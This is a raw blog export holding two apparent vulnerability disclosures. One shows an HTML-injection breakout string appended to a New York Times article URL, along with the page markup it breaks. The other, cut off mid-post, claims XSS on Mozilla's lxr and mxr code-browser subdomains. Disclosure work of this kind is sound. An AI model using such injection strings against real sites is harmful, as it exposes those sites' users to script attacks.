<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">(2) Vulnerability Analysis:</span></b></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Take the following link as an example,</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a data-mce-href="http://www.nytimes.com/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/" href="http://www.nytimes.com/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/" target="_blank">http://www.nytimes.com/2012/<wbr></wbr>02/12/sunday-review/big-datas-<wbr></wbr>impact-in-the-world.html/</a>“><<wbr></wbr>vulnerabletoattack</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">It can see that for the page reflected, it contains the following codes. All of them are vulnerable.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><li class=”print”></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href=”/2012/02/12/sunday-<wbr></wbr>review/big-datas-impact-in-<wbr></wbr>the-world.html/”><<wbr></wbr>vulnerabletoattack?pagewanted=<wbr></wbr>print”>Print</testtesttest?<wbr></wbr>pagewanted=print”></a></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"></li></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><li class=”singlePage”></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href=”/2012/02/12/sunday-<wbr></wbr>review/big-datas-impact-in-<wbr></wbr>the-world.html/”><<wbr></wbr>testtesttest?pagewanted=all”> Single Page</vulnerabletoattack?<wbr></wbr>pagewanted=all”></a></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"> </li></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><li> <a onclick=”s_code_linktrack(‘<wbr></wbr>Article-MultiPagePageNum2′);” title=”Page 2″ href=”/2012/02/12/sunday-<wbr></wbr>review/big-datas-impact-in-<wbr></wbr>the-world.html/”><<wbr></wbr>vulnerabletoattack?pagewanted=<wbr></wbr>2″>2</testtesttest?pagewanted=<wbr></wbr>2″></a> </span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"></li></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><li> <a onclick=”s_code_linktrack(‘<wbr></wbr>Article-MultiPagePageNum3′);” title=”Page 3″ href=”/2012/02/12/sunday-<wbr></wbr>review/big-datas-impact-in-<wbr></wbr>the-world.html/”><<wbr></wbr>vulnerabletoattack?pagewanted=<wbr></wbr>3″>3</testtesttest?pagewanted=<wbr></wbr>3″></a> </span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"></li></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a class=”next” onclick=”s_code_linktrack(‘<wbr></wbr>Article-MultiPage-Next’);” title=”Next Page” href=”/2012/02/12/sunday-<wbr></wbr>review/big-datas-impact-in-<wbr></wbr>the-world.html/”><<wbr></wbr>vulnerabletoattack?pagewanted=<wbr></wbr>2″>Next Page »</testtesttest?pagewanted=2″><wbr></wbr></a></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><b><span style="font-family: Arial, Helvetica, sans-serif;">(3) What is XSS?</span></b></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications. XSS enables attackers to inject client-side script into Web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same origin policy.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="background-color: white; line-height: 19.6000003814697px; text-align: justify;"><span style="font-family: Arial, Helvetica, sans-serif;">"Hackers are constantly experimenting with a wide repertoire of hacking techniques to compromise websites and web applications and make off with a treasure trove of sensitive data including credit card numbers, social security numbers and even medical records. Cross-site Scripting (also known as XSS or CSS) is generally believed to be one of the most common application layer hacking techniques Cross-site Scripting allows an attacker to embed malicious JavaScript, VBScript, ActiveX, HTML, or Flash into a vulnerable dynamic page to fool the user, executing the script on his machine in order to gather data. The use of XSS might compromise private information, manipulate or steal cookies, create requests that can be mistaken for those of a valid user, or execute malicious code on the end-user systems. The data is usually formatted as a hyperlink containing malicious content and which is distributed over any possible means on the internet." (Acunetix)</span></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; line-height: 19.6000003814697px; text-align: justify;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; line-height: 19.6000003814697px; text-align: justify;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; line-height: 19.6000003814697px; text-align: justify;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; line-height: 19.6000003814697px; text-align: justify;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">The vulnerability can be attacked without user login. Tests were performed on Firefox (34.0) in Ubuntu (14.04) and IE (9.0.15) in Windows 8.</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="background-color: white; line-height: 19.6000003814697px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Discover and Reporter:</span></div>
</div>
<div style="background-color: white; line-height: 19.6000003814697px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Jing Wang, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. (<a href="https://twitter.com/justqdjing/status/558912434010730497">@justqdjing</a>)</span></div>
</div>
<div style="background-color: white; line-height: 19.6000003814697px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<div style="margin: 0px;">
<span style="-webkit-transition: color 0.3s; outline: none; transition: color 0.3s;"><a href="http://www.tetraph.com/wangjing" style="-webkit-transition: color 0.3s; display: inline; outline: none; text-decoration: none; transition: color 0.3s;" target="_blank"><span style="font-family: Arial, Helvetica, sans-serif;">http://www.tetraph.com/<wbr></wbr>wangjing</span></a></span></div>
</div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">More Details:</span></b></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://lists.openwall.net/full-disclosure/2014/10/16/2"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://lists.openwall.net/full-disclosure/2014/10/16/2</span></a></div>
<div style="margin: 0px;">
<a href="http://www.tetraph.com/blog/xss-vulnerability/new-york-times-nytimes-com-page-design-xss-vulnerability-almost-all-article-pages-are-affected/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.tetraph.com/blog/xss-vulnerability/new-york-times-xss</span></a></div>
<div style="margin: 0px;">
<a href="http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1102"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1102</span></a></div>
<div style="margin: 0px;">
<a href="http://webcabinet.tumblr.com/post/121907302752/new-york-times-xss"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://webcabinet.tumblr.com/post/121907302752/new-york-times-xss</span></a></div>
<div style="margin: 0px;">
<a href="http://www.inzeed.com/kaleidoscope/xss-vulnerability/new-york-times-nytimes-com-page-design-xss-vulnerability-almost-all-article-pages-are-affected/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.inzeed.com/kaleidoscope/xss-vulnerability/new-york-times-xss</span></a></div>
<div style="margin: 0px;">
<a href="https://progressive-comp.com/?l=full-disclosure&m=141343993908563&w=1"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://progressive-comp.com/?l=full-disclosure&m=141343993908563&w=1</span></a></div>
<div style="margin: 0px;">
<a href="http://webtech.lofter.com/post/1cd3e0d3_6f57c56"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://webtech.lofter.com/post/1cd3e0d3_6f57c56</span></a></div>
<div style="margin: 0px;">
<a href="http://tetraph.blog.163.com/blog/static/2346030512014101270479/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://tetraph.blog.163.com/blog/static/2346030512014101270479/</span></a></div>
<div style="margin: 0px;">
<a href="https://vulnerabilitypost.wordpress.com/2014/11/01/new-york-times-nytimes-com-page-design-xss-vulnerability-almost-all-article-pages-before-2013-are-affected/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://vulnerabilitypost.wordpress.com/2014/11/01/new-york-times-xss</span></a></div>
<div style="margin: 0px;">
<a href="http://lifegrey.tumblr.com/post/121912534859/tous-les-liens-vers-les-articles-du-new-york-times"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://lifegrey.tumblr.com/post/121912534859/tous-les-liens-vers-les-articles</span></a></div>
<div style="margin: 0px;">
<a href="http://securityrelated.blogspot.com/2014/10/new-york-times-nytimescom-page-design.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://securityrelated.blogspot.com/2014/10/new-york-times-design.html</span></a></div>
<div style="margin: 0px;">
<a href="https://mathfas.wordpress.com/2014/11/01/new-york-times-nytimes-com-page-design-xss-vulnerability-almost-all-article-pages-before-2013-are-affected/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://mathfas.wordpress.com/2014/11/01/new-york-times-xss</span></a></div>
<div style="margin: 0px;">
<a href="http://computerobsess.blogspot.com/2014/10/new-york-times-nytimescom-page-design.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://computerobsess.blogspot.com/2014/10/new-york-times-design.html</span></a></div>
<div style="margin: 0px;">
<a href="http://whitehatview.tumblr.com/post/103788276286/urls-to-articles-in-new-york-times-nyt-published"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://whitehatview.tumblr.com/post/103788276286/urls-to-articles-xss</span></a></div>
<div style="margin: 0px;">
<a href="http://diebiyi.com/articles/security/xss-vulnerability/new-york-times-nytimes-com-page-design-xss-vulnerability-almost-all-article-pages-are-affected/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://diebiyi.com/articles/security/xss-vulnerability/new-york-times-xss</span></a></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-6322800700334987667.post-65368274636303813292015-06-20T02:15:00.003-07:002015-06-20T02:15:50.101-07:00Mozilla Online Website Two Sub-Domains XSS (Cross-site Scripting) Bugs ( All URLs Under the Two Domains)<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>Mozilla Online Website Two Sub-Domains XSS (Cross-site Scripting) Bugs ( All URLs Under the Two Domains)</b></span></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /><br /><br /><span style="font-size: small;"><b>Domains:</b></span></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;">http://lxr.mozilla.org/</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;">http://mxr.mozilla.org/</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;">(The two domains above are almost the same)</span></div>
</div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: small;"><b><br /></b></span><span style="font-size: small;"><b><br /></b></span><span style="font-size: small;"><b>Websites information:</b></span></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;">"lxr.mozilla.org, mxr.mozilla.org are cross references designed to display the Mozilla source code. The sources displayed are those that are currently checked in to the mainline of the mozilla.org CVS server, Mercurial Server, and Subversion Server; these pages are updated many times a day, so they should be pretty close to the latest‑and‑greatest." (from Mozilla)</span></div>
</div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br />"Mozilla is a free-software community which produces the Firefox web browser. The Mozilla community uses, develops, spreads and supports Mozilla products, thereby promoting exclusively free software and open standards, with only minor exceptions. The community is supported institutionally by the Mozilla Foundation and its tax-paying subsidiary, the Mozilla Corporation. In addition to the Firefox browser, Mozilla also produces Thunderbird, Firefox Mobile, the Firefox OS mobile operating system, the bug tracking system Bugzilla and a number of other projects." (Wikipedia)</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /></span></div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: small;"><b><br /></b></span><span style="font-size: small;"><b><br /></b></span><span style="font-size: small;"><b>(1) Vulnerability description:</b></span></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span style="background-color: white; line-height: 19.6px; text-align: justify;">Mozilla website has a computer cyber security problem. Hacker can attack it by XSS bugs. Here is the description of XSS: "Hackers are constantly experimenting with a wide repertoire of hacking techniques to compromise websites and web applications and make off with a treasure trove of sensitive data including credit card numbers, social security numbers and even medical records. Cross-site Scripting (also known as XSS or CSS) is generally believed to be one of the most common application layer hacking techniques Cross-site Scripting allows an attacker to embed malicious JavaScript, VBScript, ActiveX, HTML, or Flash into a vulnerable dynamic page to fool the user, executing the script on his machine in order to gather data. The use of XSS might compromise private information, manipulate or steal cookies, create requests that can be mistaken for those of a valid user, or execute malicious code on the end-user systems. The data is usually formatted as a hyperlink containing malicious content and which is distributed over any possible means on the internet." (Acunetix)</span></span></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: small;"><span style="background-color: white; line-height: 19.6px; text-align: justify;"><br /></span></span><span style="font-size: small;"><span style="background-color: white; line-height: 19.6px; text-align: justify;"><br /></span></span><span style="font-size: small;"><span style="background-color: white; line-height: 19.6px; text-align: justify;"><br /></span></span></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;">All pages under the following two URLs are vulnerable.</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;">http://lxr.mozilla.org/mozilla-central/source</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;">http://mxr.mozilla.org/mozilla-central/source</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;">This means all URLs under the above two domains can be used for XSS attacks targeting Mozilla's users.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;">Since there are large number of pages under them. Meanwhile, the contents of the two domains vary. This makes the vulnerability very dangerous. Attackers can use different URLs to design XSS attacks to Mozilla's variety class of users.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /><br /></span></div>
<div class="separator" style="clear: both; margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOP5L1EdUMs9gLZPu92fxGB4Ij_U3rs8liSFPHMS1NFi5zYZ9JRzRurqxzMmaxMQ4I2CFFuha7wtfkCnVM03NUkc2FCQChL2E8r1C9zIicqAX2lU9ZBadjgheLZd8Qcs2uixZs3JP8VCQ/s1600/mozilla_lxr_2_xss.png" style="margin-left: 1em; margin-right: 1em;"><span style="color: black;"><img border="0" height="253" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOP5L1EdUMs9gLZPu92fxGB4Ij_U3rs8liSFPHMS1NFi5zYZ9JRzRurqxzMmaxMQ4I2CFFuha7wtfkCnVM03NUkc2FCQChL2E8r1C9zIicqAX2lU9ZBadjgheLZd8Qcs2uixZs3JP8VCQ/s1600/mozilla_lxr_2_xss.png" style="cursor: move;" width="400" /></span></a></span></span></div>
<div class="separator" style="clear: both; margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZD_C5WvoPiR9x-NF9ZYa8Ii2JYBzLx1S0Z-DvtCjs35ZrDBhEgRPxUjXy0iK_w-owRh8Y6zSCjwNesTEoeD4UUrJncnb7CMjU6xvBXacupHu3g1XeUo5Wj346vRhk0oxFp61QDmkPLc0/s1600/mozilla_mxr_1_xss.png" style="margin-left: 1em; margin-right: 1em;"><span style="color: black;"><img border="0" height="253" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZD_C5WvoPiR9x-NF9ZYa8Ii2JYBzLx1S0Z-DvtCjs35ZrDBhEgRPxUjXy0iK_w-owRh8Y6zSCjwNesTEoeD4UUrJncnb7CMjU6xvBXacupHu3g1XeUo5Wj346vRhk0oxFp61QDmkPLc0/s1600/mozilla_mxr_1_xss.png" style="cursor: move;" width="400" /></span></a></span></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /><br /><br /><br /><span style="font-size: small;"><b><br /></b></span></span></div>
<div>
<div style="margin: 0px;">
